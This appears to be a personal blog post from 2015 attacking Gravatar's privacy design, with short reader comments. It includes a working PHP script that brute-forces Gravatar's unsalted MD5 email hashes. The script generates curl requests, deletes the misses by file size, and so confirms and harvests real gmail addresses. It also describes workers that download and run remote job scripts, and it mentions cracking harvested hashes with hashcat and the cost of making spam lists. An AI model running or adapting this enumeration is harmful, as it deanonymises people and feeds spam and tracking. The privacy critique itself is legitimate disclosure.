Gravatar still sucks
Let's begin with a picture - they're worth ten thousand emails from what I hear.
Yes, if you see your Gravatar image there it means I have your email now. Because Gravatar sucks, just like Automattic sucks, just like Disqus sucks, just like the entire bezzle-powered world sucks.
Unlike the previously announced attacksi, I simply used the following script to generate curl queries :
<?
$alph = array ("a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w",
"x", "y", "z", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0");
// google uses a braindamaged private specii
for ($i = 0; $i <= 1700000iii; $i++) {
$over = $i;
$mant = $over % 36;
$string = $alph[$mant];
while ($over > 0) {
$over = floor($over / 36);
$mant = $over % 36;
if ($mant+$over > 1) $string .= $alph[$mant];
}
echo "curl -o ".$string.".jpg http://www.gravatar.com/avatar/"
,md5($string."@gmail.com"),"?s=32 \n";
if ($i % 1000 == 135) echo "find . -size 1258c -delete\n
find . -size 1267c -delete\n"iv;
}
?>
If you host this on a server somewhere, you can have workers periodically connect to aquire a job chunkv through something as trivial as
curl http://some.domain/script.php > job.sh
That bash script can then be executed, leaving behind a list of good hits (which you don't even have to retrieve, all you really need is a directory list). A half decent machine should be able to pull something like 50-100 links per second, which means that if you have say ten thousand available you can explore the entire space of one to six characters in a little over an hour.vi
The approach has some advantages : it will verify @gmail.com emails (or @yahoo.com, or whatever else you may care to check), and associate them with a Gravatar whether they were actually ever used on any website or notvii. Unlike the method described by Bongard et all, it also won't miss anything.viii In exchange, it's probably slow - don't expect much more than a few dozen hits per million tries.ix
Please stop empowering idiots, con men and government agents. Especially if you, like me, don't particularly enjoy living in a world populated by idiots, con men and government agents.
———- One Dominique Bongard had the idea of sniffing up all the gravatars displayed on some random French website. Since the gravatar image is linked through a snippet of html that looks something like
<img src=http://www.gravatar.com/avatar/4455581a551bb258eb106aad0d54dc15?s=32&d=http%3A%2F%2Fwww.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&r=X></img>
and since they have to be included on the page to be visible, it's trivial to gather a sizable collection by merely browsing the web.
The first string in that url is a plain unsalted (remember Fetlife ?) md5 hash of the corresponding email, which is not really all that hard to break, using something like hashcat's hybrid algorithms. With the advent of Bitcoin and the exponential increase in worldwide hashing power it has driven, it should come as no surprise that Bongard managed to retrieve the emails out of something like 40% of the hashes he collected.
This obviously has very real implications in the thirld world country of France. Given its appaling record of human rights violations (merely expressing certain verboten oppinions is grounds for conviction in that God-forsaken shithole, not to mention trivialities like taking a paternity test, or lying about your age), having one's email leaked in this manner readily compares to having one's radio transmission triangulated by the Gestapo, or having one's typewriter identified as the source of самиздат.
We should probably observe a moment of silence for all the innocent men and women Gravatar slaugthered, maliciously or ineptly as the case may be. [↩]
- Capitals are ignored, dots are ignored, etc. [↩]
- Enough to cover four character emails, but the number is obviously arbitrary [↩]
- This line cleans up the directory periodically. It so happens that the gravatar fail hits come in two flarous, one 1`267 bytes long, the other 1`258 bytes long. Why exactly two is perhaps a mystery for another book. [↩]
- You will need some mechanism to increment the job chunks as they're doled out, obviously. [↩]
- 366 = 2`176`782`336 / 50 / 3600 / 10000 ~= 1.20, or 72 minutes. [↩]
- Of course if they were ever used, each instance can then be located (through a service like Google's own image search, or any of the competitors'). [↩]
- Speaking of which, don't you think it's a little strange that banal stuff like a program to scarf up all gravatar-email pairs and track them around the web was not included in the wikileaks/Snowden revelations, while all sorts of patently ridiculous kookware is included ? Asa putin ? Putin putin ? [↩]
- Then again, computers are cheap these days - a whole month's worth of 50/second (~5 mn tries or so) shouldn't run one over a hundred dollars, probably ten being closer to norm - which would put the cost of acquiring emails in this manner at a few pennies per. Spammers sell "quality" email lists for about a degree of magnitude less than that, so it's probably not (or marginally not) an economic process to generate spamlists. Yet.
This is important : Gravatar, through its ridoinculous unsalted md5 "technologies", sets the bar of your privacy at the level of "marginally not economical to harvest for spam". Why do you want anything to do with these assholes again ? [↩]
Sunday, 10 May 2015
Hi :)
Sunday, 10 May 2015
Ce mai zici tu tucu-te!
Tuesday, 12 May 2015
Seara buna, iaca nu mai zic nimic... sclavagesc in tacere!
Tuesday, 12 May 2015
Cica tacerea ie semn de-ntelepciune tu.
Thursday, 21 May 2015
Implementing this using something such as libcurl for extra speed is left as an exercise for the little "hackers" out there. :P
Thursday, 21 May 2015
Ighen.